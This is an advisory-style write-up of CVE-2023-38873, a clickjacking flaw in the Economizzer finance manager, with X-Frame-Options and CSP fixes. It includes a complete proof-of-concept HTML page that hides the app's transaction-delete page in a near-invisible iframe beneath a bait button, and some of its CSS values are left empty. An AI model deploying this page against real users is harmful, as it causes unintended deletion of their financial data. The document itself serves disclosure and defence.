CVE-2023-38873 - Clickjacking Vulnerability in Economizzer (Commit 373088 and v.9-beta1)
Clickjacking, also called "UI redress attack," is one of those web vulnerabilities that looks simple—but can cost you dearly if left unchecked. CVE-2023-38873 targets versions of Economizzer—the open-source personal finance manager. Specifically, commit 373088 (April 2023) and the v.9-beta1 release are affected. Here’s what developers, users, and sysadmins should know to stay safe.
What is Clickjacking?
Clickjacking is when an attacker tricks a user into clicking on something different than what they see. For example, you think you’re clicking a fun button or a link, but in reality, it is a hidden element—maybe a “delete account” or “transfer funds” button from another application—perhaps even running on a different domain!
How? The attacker places the real page inside an invisible or partially visible frame (<iframe>) and then puts some fake UI on top. When you think you’re clicking the safe element, your click actually goes to the dangerous, hidden button below. This is “hijacking” your intent.
Vulnerability Details
Economizzer’s web app, at commit 373088 (April 2023) and v.9-beta1, does not prevent its pages from being loaded inside a frame (<iframe>). This means any external site can embed Economizzer's pages and trick users into clicking on dangerous buttons (like Delete, Transfer, or Logout).
Suppose you have your Economizzer running at
https://your-economizzer.example.com/
An attacker can easily create a malicious page, like this
<!DOCTYPE html>
<html>
<head>
<title>Totally Innocent Site</title>
<style>
iframe {
opacity: .01; /* almost invisible */
position: absolute;
top: ;
left: ;
width: 800px;
height: 600px;
z-index: 2;
}
.bait {
position: absolute;
top: 190px;
left: 370px;
z-index: 1;
background: #42a5f5;
padding: 40px 90px;
font-size: 30px;
color: white;
cursor: pointer;
border-radius: 12px;
}
</style>
</head>
<body>
<iframe src="https://your-economizzer.example.com/transactions/delete/123"></iframe>
<div class="bait">Click Here for a Surprise!</div>
</body>
</html>
If you’re logged in to your Economizzer, clicking the “Click Here for a Surprise!” button will actually execute the delete action on your Economizzer, not the fun action the attacker promised!
Why Is This Possible?
The root cause is the missing X-Frame-Options or Content-Security-Policy headers. These headers, when properly set, prevent your webapp from being loaded in <iframe>s by third-party sites.
#### Economizzer (v.9-beta1 / 373088) – What You See in the Code
No line in the code or web server setup generates headers like
X-Frame-Options: SAMEORIGIN
or
Content-Security-Policy: frame-ancestors 'self'
So, pages are free to be embedded almost anywhere.
How to Fix
If you run Economizzer on the affected versions, add a security header. This can often be done in your web server (Apache, Nginx, etc.), or inside app code (using PHP).
Add this to your .htaccess or site config
Header set X-Frame-Options "SAMEORIGIN"
Add this to your server block
add_header X-Frame-Options "SAMEORIGIN";
At the top of your PHP scripts
header('X-Frame-Options: SAMEORIGIN');
Or, use the stronger modern approach
header("Content-Security-Policy: frame-ancestors 'self'");
References
- Economizzer - Commit 373088
- v.9-beta1 Release
- OWASP: Clickjacking
- MDN: X-Frame-Options
- MDN: Content-Security-Policy/frame-ancestors
Summary
CVE-2023-38873 exposes Economizzer users to clickjacking attacks. Attackers can trick users into clicking buttons or links that do things they never intended—including deleting or changing financial data—just by exploiting invisible frames. Until developers patch this, users and admins should always set the right headers in their web servers. ALWAYS use X-Frame-Options or Content-Security-Policy! Stay safe—don’t get hijacked!
This writeup is exclusive for this conversation—please share the knowledge to protect your apps and your users.
Timeline
Published on: 09/28/2023 04:15:12 UTC
Last modified on: 10/02/2023 20:48:21 UTC